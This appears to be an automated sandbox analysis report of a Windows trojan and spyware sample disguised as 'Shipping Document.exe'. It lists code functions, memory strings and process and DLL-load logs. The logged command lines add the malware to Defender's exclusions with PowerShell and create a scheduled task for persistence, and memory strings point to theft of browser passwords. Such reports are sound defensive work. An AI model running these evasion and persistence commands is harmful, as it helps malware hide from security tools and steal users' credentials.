                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0A0007B912_2_0A0007B9
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0A00A4F012_2_0A00A4F0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0A00651812_2_0A006518
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0A0005F012_2_0A0005F0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0A0019B012_2_0A0019B0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0A0019C012_2_0A0019C0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0A00C38912_2_0A00C389
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0A00000712_2_0A000007
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0A00003012_2_0A000030
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0A00004012_2_0A000040
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0A00165812_2_0A001658
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0A00169812_2_0A001698
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_0A0005E012_2_0A0005E0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0135010020_2_01350100
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_013A600020_2_013A6000
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_013E02C020_2_013E02C0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0136053520_2_01360535
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0136077020_2_01360770
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0138475020_2_01384750
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0135C7C020_2_0135C7C0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0137C6E020_2_0137C6E0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0137696220_2_01376962
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_013629A020_2_013629A0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0136284020_2_01362840
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0136A84020_2_0136A840
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_013468B820_2_013468B8
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0139889020_2_01398890
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0138E8F020_2_0138E8F0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0135EA8020_2_0135EA80
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0136AD0020_2_0136AD00
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0136ED7A20_2_0136ED7A
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_01378DBF20_2_01378DBF
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0135ADE020_2_0135ADE0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_01368DC020_2_01368DC0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_01360C0020_2_01360C00
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_01350CF220_2_01350CF2
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_01380F3020_2_01380F30
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_013A2F2820_2_013A2F28
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_013D4F4020_2_013D4F40
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_013DEFA020_2_013DEFA0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_01352FC820_2_01352FC8
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_01360E5920_2_01360E59
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_01372E9020_2_01372E90
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0134F17220_2_0134F172
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0139516C20_2_0139516C
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0136B1B020_2_0136B1B0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0134D34C20_2_0134D34C
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_013633F320_2_013633F3
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_013652A020_2_013652A0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0137D2F020_2_0137D2F0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0137B2C020_2_0137B2C0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0135146020_2_01351460
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0136349720_2_01363497
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_013A74E020_2_013A74E0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0136B73020_2_0136B730
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0136995020_2_01369950
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0137B95020_2_0137B950
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0136599020_2_01365990
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_013CD80020_2_013CD800
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_013638E020_2_013638E0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0137FB8020_2_0137FB80
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0139DBF920_2_0139DBF9
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_013D5BF020_2_013D5BF0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_013D3A6C20_2_013D3A6C
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_01363D4020_2_01363D40
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_0137FDC020_2_0137FDC0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_013D9C3220_2_013D9C32
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_01379C2020_2_01379C20
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_01361F9220_2_01361F92
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 20_2_01369EB020_2_01369EB0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: String function: 01145130 appears 58 times
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: String function: 0117EA12 appears 86 times
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: String function: 010FB970 appears 277 times
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: String function: 01157E54 appears 111 times
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: String function: 0118F290 appears 105 times
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: String function: 013A7E54 appears 97 times
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: String function: 013CEA12 appears 37 times
                Source: Shipping Document.exe, 00000000.00000002.1296197504.0000000009B90000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs Shipping Document.exe
                Source: Shipping Document.exe, 00000000.00000002.1268642762.0000000002701000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs Shipping Document.exe
                Source: Shipping Document.exe, 00000000.00000002.1287455872.0000000004CBB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEj% vs Shipping Document.exe
                Source: Shipping Document.exe, 00000000.00000000.1243695100.0000000000438000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamexqqP.exe4 vs Shipping Document.exe
                Source: Shipping Document.exe, 00000000.00000002.1268642762.000000000275C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs Shipping Document.exe
                Source: Shipping Document.exe, 00000000.00000002.1267858070.0000000000B8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Shipping Document.exe
                Source: Shipping Document.exe, 00000000.00000002.1296658325.0000000009BF0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Shipping Document.exe
                Source: Shipping Document.exe, 00000000.00000002.1270712727.0000000003F05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Shipping Document.exe
                Source: Shipping Document.exe, 0000000A.00000002.1436632647.00000000011FD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Shipping Document.exe
                Source: Shipping Document.exe, 0000000A.00000002.1436200153.0000000000C78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXCOPY.EXEj% vs Shipping Document.exe
                Source: Shipping Document.exeBinary or memory string: OriginalFilenamexqqP.exe4 vs Shipping Document.exe
                Source: Shipping Document.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Shipping Document.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: KOENBvWt.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: Shipping Document.exeStatic PE information: Section: taM%C#%u ZLIB complexity 1.000383148923445
                Source: KOENBvWt.exe.0.drStatic PE information: Section: taM%C#%u ZLIB complexity 1.000383148923445
                Source: 0.2.Shipping Document.exe.41d38f0.6.raw.unpack, F7dFk7fClPC3QVcrtR.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.Shipping Document.exe.41d38f0.6.raw.unpack, F7dFk7fClPC3QVcrtR.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Shipping Document.exe.9bf0000.8.raw.unpack, e6tPm0aIb7UvqPflDt.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.Shipping Document.exe.9bf0000.8.raw.unpack, e6tPm0aIb7UvqPflDt.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Shipping Document.exe.9bf0000.8.raw.unpack, e6tPm0aIb7UvqPflDt.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.Shipping Document.exe.9bf0000.8.raw.unpack, F7dFk7fClPC3QVcrtR.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.Shipping Document.exe.9bf0000.8.raw.unpack, F7dFk7fClPC3QVcrtR.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Shipping Document.exe.4148ed0.5.raw.unpack, e6tPm0aIb7UvqPflDt.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.Shipping Document.exe.4148ed0.5.raw.unpack, e6tPm0aIb7UvqPflDt.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Shipping Document.exe.4148ed0.5.raw.unpack, e6tPm0aIb7UvqPflDt.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.Shipping Document.exe.4148ed0.5.raw.unpack, F7dFk7fClPC3QVcrtR.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.Shipping Document.exe.4148ed0.5.raw.unpack, F7dFk7fClPC3QVcrtR.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Shipping Document.exe.41d38f0.6.raw.unpack, e6tPm0aIb7UvqPflDt.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.Shipping Document.exe.41d38f0.6.raw.unpack, e6tPm0aIb7UvqPflDt.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Shipping Document.exe.41d38f0.6.raw.unpack, e6tPm0aIb7UvqPflDt.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@23/16@13/9
                Source: C:\Users\user\Desktop\Shipping Document.exeFile created: C:\Users\user\AppData\Roaming\KOENBvWt.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeMutant created: NULL
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeMutant created: \Sessions\1\BaseNamedObjects\XeEALHyTSqlZCHT
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2628:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6180:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5508:120:WilError_03
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7284:120:WilError_03
                Source: C:\Users\user\Desktop\Shipping Document.exeFile created: C:\Users\user\AppData\Local\Temp\tmpC1E2.tmpJump to behavior
                Source: Shipping Document.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                Source: C:\Users\user\Desktop\Shipping Document.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: xcopy.exe, 00000016.00000002.3688129480.000000000359A000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000016.00000002.3688129480.00000000035CE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000016.00000003.1623169810.00000000035CE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000016.00000003.1623169810.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Shipping Document.exeVirustotal: Detection: 35%
                Source: Shipping Document.exeReversingLabs: Detection: 31%
                Source: C:\Users\user\Desktop\Shipping Document.exeFile read: C:\Users\user\Desktop\Shipping Document.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\Shipping Document.exe "C:\Users\user\Desktop\Shipping Document.exe"
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipping Document.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\KOENBvWt.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KOENBvWt" /XML "C:\Users\user\AppData\Local\Temp\tmpC1E2.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess created: C:\Users\user\Desktop\Shipping Document.exe "C:\Users\user\Desktop\Shipping Document.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\KOENBvWt.exe C:\Users\user\AppData\Roaming\KOENBvWt.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KOENBvWt" /XML "C:\Users\user\AppData\Local\Temp\tmp765E.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeProcess created: C:\Users\user\AppData\Roaming\KOENBvWt.exe "C:\Users\user\AppData\Roaming\KOENBvWt.exe"
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exeProcess created: C:\Windows\SysWOW64\xcopy.exe "C:\Windows\SysWOW64\xcopy.exe"
                Source: C:\Windows\SysWOW64\xcopy.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipping Document.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\KOENBvWt.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KOENBvWt" /XML "C:\Users\user\AppData\Local\Temp\tmpC1E2.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess created: C:\Users\user\Desktop\Shipping Document.exe "C:\Users\user\Desktop\Shipping Document.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KOENBvWt" /XML "C:\Users\user\AppData\Local\Temp\tmp765E.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeProcess created: C:\Users\user\AppData\Roaming\KOENBvWt.exe "C:\Users\user\AppData\Roaming\KOENBvWt.exe"Jump to behavior
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exeProcess created: C:\Windows\SysWOW64\xcopy.exe "C:\Windows\SysWOW64\xcopy.exe"
                Source: C:\Windows\SysWOW64\xcopy.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Shipping Document.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
